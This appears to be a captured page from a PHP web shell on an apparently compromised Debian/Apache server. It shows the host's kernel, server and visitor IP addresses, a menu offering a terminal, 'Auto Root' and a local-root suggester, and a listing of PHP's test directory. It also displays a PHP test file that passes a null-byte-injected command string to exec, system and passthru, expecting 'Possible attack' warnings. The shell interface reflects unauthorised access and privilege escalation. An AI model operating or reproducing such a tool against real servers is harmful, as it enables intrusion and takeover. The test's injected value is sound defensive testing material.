Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
standard /
tests /
misc /
Delete
Unzip
Name
Size
Permission
Date
Action
browscap.ini
294.85
KB
-rw-rw-r--
2022-10-31 11:36
browscap_lite_2016_12_06.ini
297.76
KB
-rw-rw-r--
2022-10-31 11:36
browscap_no_default.ini
28
B
-rw-rw-r--
2022-10-31 11:36
browsernames.inc
3.17
KB
-rw-rw-r--
2022-10-31 11:36
bug65550.phpt
409
B
-rw-rw-r--
2022-10-31 11:36
bug69983.phpt
969
B
-rw-rw-r--
2022-10-31 11:36
bug77338.phpt
1.3
KB
-rw-rw-r--
2022-10-31 11:36
bug79410.phpt
262
B
-rw-rw-r--
2022-10-31 11:36
exec_basic1.phpt
643
B
-rw-rw-r--
2022-10-31 11:36
get_browser_basic.phpt
25.9
KB
-rw-rw-r--
2022-10-31 11:36
get_browser_error.phpt
2.28
KB
-rw-rw-r--
2022-10-31 11:36
get_browser_no_default.phpt
158
B
-rw-rw-r--
2022-10-31 11:36
get_browser_variation1.phpt
24.63
KB
-rw-rw-r--
2022-10-31 11:36
get_browser_variation2.phpt
1.47
KB
-rw-rw-r--
2022-10-31 11:36
get_browser_variation3.phpt
164.47
KB
-rw-rw-r--
2022-10-31 11:36
syslog_basic.phpt
183
B
-rw-rw-r--
2022-10-31 11:36
time_nanosleep_basic.phpt
704
B
-rw-rw-r--
2022-10-31 11:36
time_nanosleep_error3.phpt
371
B
-rw-rw-r--
2022-10-31 11:36
time_nanosleep_error4.phpt
464
B
-rw-rw-r--
2022-10-31 11:36
time_nanosleep_error5.phpt
388
B
-rw-rw-r--
2022-10-31 11:36
time_sleep_until_basic.phpt
1.48
KB
-rw-rw-r--
2022-10-31 11:36
time_sleep_until_error1.phpt
487
B
-rw-rw-r--
2022-10-31 11:36
user_agents.txt
92.7
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- exec, system, passthru — Basic command execution functions --SKIPIF-- <?php // If this does not work for Windows, please uncomment or fix test // if(substr(PHP_OS, 0, 3) == "WIN") die("skip not for Windows"); ?> --FILE-- <?php $cmd = "echo abc\n\0command"; var_dump(exec($cmd, $output)); var_dump($output); var_dump(system($cmd)); var_dump(passthru($cmd)); ?> --EXPECTF-- Warning: exec(): NULL byte detected. Possible attack in %s on line %d bool(false) NULL Warning: system(): NULL byte detected. Possible attack in %s on line %d bool(false) Warning: passthru(): NULL byte detected. Possible attack in %s on line %d bool(false)